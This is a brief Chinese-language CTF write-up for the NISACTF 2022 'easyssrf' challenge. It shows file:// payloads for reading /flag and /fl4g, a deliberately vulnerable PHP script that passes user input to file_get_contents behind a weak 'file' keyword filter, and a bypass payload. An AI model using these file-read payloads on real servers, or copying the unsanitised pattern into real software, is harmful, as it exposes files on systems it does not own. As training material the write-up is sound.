知识
1.基本介绍
2.flie//读取文件
实例
NSS
[NISACTF 2022]easyssrf
尝试file://读取flag
file:///flag
根据提示尝试读取/fl4g
file:///fl4g
访问ha1x1ux1u.php得到源码
<?php
highlight_file(__FILE__);
error_reporting(0);
$file = $_GET["file"];
if (stristr($file, "file")){
die("你败了.");
}
//flag in /flag
echo file_get_contents($file);
提示我们读取文件/flag
构造payload:
?file=/flag